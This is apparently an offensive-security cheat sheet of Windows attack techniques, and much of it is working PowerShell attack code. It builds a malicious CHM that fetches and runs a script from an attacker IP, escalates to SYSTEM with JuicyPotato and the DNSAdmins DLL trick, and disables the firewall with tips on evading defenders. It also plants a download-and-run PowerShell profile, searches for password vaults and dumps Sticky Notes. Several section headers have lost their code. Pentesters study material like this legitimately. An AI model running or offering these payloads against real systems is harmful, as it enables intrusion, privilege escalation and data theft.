Windows
CHM
Use a Windows VM, install the required tools from here (HTML Help Workshop), then get the script Out-CHM.ps1 and create your payload:
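As an added example (not the page's own snippet), the invocation below builds a CHM with Out-CHM from Nishang. It assumes HTML Help Workshop sits at its default install path, that Out-CHM.ps1 is in the current directory, and the callback URL is a placeholder.

```powershell
# Added example: build a CHM that runs a PowerShell one-liner when the victim opens it.
# Assumes HTML Help Workshop is installed at the default path and Out-CHM.ps1 is in the CWD.
. .\Out-CHM.ps1

# Payload to embed. The download URL is an assumption; replace it with your listener.
$payload = 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.10.14.2/run.ps1'')"'

# -HHCPath points at the HTML Help Workshop directory (hhc.exe is the compiler)
# -OutputPath is where the compiled .chm is written
Out-CHM -Payload $payload `
        -HHCPath "C:\Program Files (x86)\HTML Help Workshop" `
        -OutputPath .\

# The CHM only fires when opened with hh.exe on the target; it does nothing when
# merely previewed in a mail client, so pair it with a plausible document name.
Get-ChildItem .\*.chm
```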
Juicy Potato
Metasploit (Details)
Common CLSIDs for the exploit are:
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{752073A1-23F2-4396-85F0-8FDB879ED0ED}
{3c6859ce-230b-48a4-be6c-932c0c202048}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
More can be found here
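Added example of a typical JuicyPotato run (not code from the page or the tool's own docs). It assumes the current account holds SeImpersonatePrivilege (service accounts such as IIS APPPOOL or MSSQL usually do), that JuicyPotato.exe has been dropped in the current directory, and that the first CLSID from the list works on this build; if it fails, iterate over the others.

```powershell
# Added example: abuse SeImpersonatePrivilege with JuicyPotato to run a command as SYSTEM.
# Prerequisite check: the privilege must be present (enabled or not).
whoami /priv | findstr /i impersonate

# CLSID must match the OS version; this one is an assumption, try the list above until one works.
$clsid = '{e60687f7-01a1-40aa-86ac-db1cbf673334}'

# -l : local port the fake COM server listens on
# -p : program to launch as SYSTEM
# -a : arguments for that program
# -t * : try both CreateProcessWithTokenW and CreateProcessAsUser
# -c : CLSID of the COM server to coerce
.\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe `
    -a "/c whoami > C:\Windows\Temp\jp.txt" -t * -c $clsid

# Verify before swapping the payload for a reverse shell.
Get-Content C:\Windows\Temp\jp.txt      # expected: nt authority\system
Remove-Item C:\Windows\Temp\jp.txt
```

To test a CLSID without running a payload, the tool's `-z` switch only performs the impersonation check; once one succeeds, swap the `-p`/`-a` pair for an nc.exe or msfvenom binary.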
Word Macro
Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:
Alternatively we can use an HTA:
Building and Signing MSIs
Use WiX to generate MSI files from XML, or to manipulate existing MSI files. A complete example can be seen in the Ethereal writeup.
Windows Firewall
List rules
Disable Firewall on Windows 7 via cmd
Disable Firewall on Windows 7 via Powershell
Disable Firewall on any Windows version via cmd
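Added example covering the four steps above in one place (not the page's own commands). The `netsh` calls work from cmd or PowerShell on every version including Windows 7; the `*-NetFirewall*` cmdlets need Windows 8 / Server 2012 or later. The rule name and port are assumptions.

```powershell
# Added example: enumerate, disable and (better) selectively open the Windows Firewall.

# --- List rules ---
netsh advfirewall firewall show rule name=all              # works everywhere
Get-NetFirewallRule -Enabled True |                        # Windows 8 / 2012+
    Where-Object Direction -eq Inbound |
    Select-Object DisplayName, Action, Profile | Format-Table -AutoSize

# --- Disable, Windows 7 (legacy 'firewall' context, still present on 7) ---
netsh firewall set opmode disable

# --- Disable, any version (advfirewall context) ---
netsh advfirewall set allprofiles state off

# --- Disable via PowerShell, Windows 8 / 2012+ ---
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# --- Less noisy alternative: open only the port your listener needs, then remove it ---
New-NetFirewallRule -DisplayName "Update Service" -Direction Inbound `
    -Action Allow -Protocol TCP -LocalPort 4444
Get-NetFirewallRule -DisplayName "Update Service" | Get-NetFirewallPortFilter
Remove-NetFirewallRule -DisplayName "Update Service"

# Re-enable when done; a disabled firewall is the first thing a blue team notices.
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True
```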
Load DLL from System32
Windows 10
RunAs
To run commands with runas, the target user has to have logged on to the machine at least once. runas also prompts for the password on the console, so it cannot be used from a non-interactive shell.
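Added example (not the page's own code) showing the interactive runas call next to the non-interactive equivalent that works from a reverse shell. Domain, user name and password are assumptions.

```powershell
# Added example: run a command as another local/domain user.

# Interactive console only: runas prompts for the password and cannot read it from stdin.
runas /user:MYDOMAIN\alice "cmd.exe /c whoami > C:\Windows\Temp\who.txt"

# From a non-interactive shell: build a PSCredential and let Start-Process log the user on.
$pw   = ConvertTo-SecureString 'Summer2024!' -AsPlainText -Force          # assumed password
$cred = New-Object System.Management.Automation.PSCredential('MYDOMAIN\alice', $pw)

Start-Process -FilePath cmd.exe `
    -ArgumentList '/c whoami > C:\Windows\Temp\who.txt' `
    -Credential $cred -NoNewWindow -Wait

Get-Content C:\Windows\Temp\who.txt      # expected: mydomain\alice

# If WinRM is enabled, the same credential also gives a full remote session:
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { whoami }
```

Start-Process with -Credential fails with "The directory name is invalid" when the working directory is not readable by the target user; pass `-WorkingDirectory C:\Windows\Temp` in that case.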
Tools
Elevate privileges by loading a custom DLL as a member of DNSAdmins
Then restart the service:
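Added example of the full DNSAdmins chain (not the page's own commands): register the DLL with dnscmd, confirm the registry value, restart the DNS service so the DLL loads as SYSTEM on the domain controller, then clean up. DC name, attacker IP, share and DLL name are assumptions.

```powershell
# Added example: DNSAdmins -> SYSTEM on the DC via ServerLevelPluginDll.
# Build the DLL on the attacker box and serve it over SMB, e.g.:
#   msfvenom -p windows/x64/exec CMD='net user hacker P@ss123! /add /domain' -f dll -o evil.dll
#   impacket-smbserver share .      (serves \\10.10.14.2\share\evil.dll)

$dc  = 'DC01'                                   # assumed DC hostname
$dll = '\\10.10.14.2\share\evil.dll'            # assumed UNC path to the DLL

# Requires DNSAdmins membership (or write access to the DNS server object).
dnscmd $dc /config /serverlevelplugindll $dll

# The setting lands in the registry of the DC; check it was accepted.
reg query \\$dc\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

# The DLL is loaded when the service starts, so restart it (runs as SYSTEM on the DC).
sc.exe \\$dc stop dns
Start-Sleep -Seconds 3
sc.exe \\$dc start dns

# A generic msfvenom DLL lacks the plugin exports, so the service may fail to start
# after executing DllMain. Clear the value and restart again to restore name resolution.
dnscmd $dc /config /serverlevelplugindll
sc.exe \\$dc start dns
```

Breaking DNS on a domain controller is very visible; clear the value immediately after the payload has fired.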
DNS Enumeration/Exploitation Tools
Bypass JEA
When running in Constrained Language Mode (or a less restrictive language mode):
Read File:
Write File:
Break out by writing a powershell profile (executed whenever powershell is started by this user):
Via Script Blocks:
Custom function:
These breakouts only work in ConstrainedLanguage mode; a JEA endpoint should be configured with NoLanguage mode, which blocks them.
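Added example (not the page's own snippets) that walks through the primitives listed above in a ConstrainedLanguage session: reading and writing files, script blocks and custom functions, and the profile drop that gives a fresh process. Paths, the target host and the callback URL are assumptions.

```powershell
# Added example: what still works in ConstrainedLanguage mode, and the profile breakout.
$ExecutionContext.SessionState.LanguageMode        # ConstrainedLanguage

# --- Read file: built-in cmdlets are allowed ---
Get-Content C:\Windows\System32\drivers\etc\hosts

# --- Write file ---
'test' | Set-Content C:\Users\Public\test.txt

# --- Script blocks still execute ---
$probe = { param($Target) Test-NetConnection $Target -Port 445 }
& $probe 10.10.14.2

# --- Custom functions still execute ---
function Get-LootFiles {
    Get-ChildItem C:\Users -Recurse -Include *.txt,*.kdbx,*.config -ErrorAction SilentlyContinue
}
Get-LootFiles

# --- Break out: write a profile that every new powershell.exe of this user runs ---
# The new process gets its own language mode: FullLanguage unless AppLocker/WDAC or
# __PSLockdownPolicy enforce CLM machine-wide, in which case the profile runs constrained too.
$profilePath = $PROFILE.CurrentUserAllHosts
New-Item -ItemType Directory -Path (Split-Path $profilePath) -Force | Out-Null
'IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.2/shell.ps1")' |
    Set-Content $profilePath
Get-Content $profilePath
```

None of this works under NoLanguage: there script blocks, functions and variable assignment are rejected by the parser before any cmdlet runs, which is why JEA role capabilities should be deployed with that mode.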
RCE via Cab Files
Reflectively load a DLL into explorer.exe
Via Invoke-ReflectivePEInjection.ps1.
Dump Sticky Note Contents
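Added example (not the page's own snippet) for the modern Sticky Notes store app (Windows 10 1607+). The database is locked while the app runs, so it is copied first; note bodies are stored as UTF-8 text prefixed with `\id=<guid> `, and the regex carves them from the raw file so no SQLite driver is needed. The carving approach and the exact prefix layout are assumptions from inspecting such files; deleted notes that have not been vacuumed are recovered too.

```powershell
# Added example: dump Sticky Notes text from plum.sqlite without a SQLite driver.
$db   = "$env:LOCALAPPDATA\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
$copy = "$env:TEMP\plum.sqlite"

# The app holds the file open; Copy-Item still succeeds because it is opened with share-read.
Copy-Item $db $copy -Force

# Treat the whole file as UTF-8 and carve every "\id=<guid> <text>" run up to the next control byte.
$raw = [Text.Encoding]::UTF8.GetString([IO.File]::ReadAllBytes($copy))
$notes = [regex]::Matches($raw, '\\id=[0-9a-f-]{36} ([^\x00-\x08\x0b\x0c\x0e-\x1f]+)') |
    ForEach-Object { $_.Groups[1].Value }

$notes | ForEach-Object { "--- note ---"; $_ }

# If sqlite3.exe is available the clean query is:
#   sqlite3 "$env:TEMP\plum.sqlite" "SELECT Text FROM Note;"
# Pre-1607 builds use %AppData%\Microsoft\Sticky Notes\StickyNotes.snt (RTF inside an OLE file).
Remove-Item $copy
```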
Resources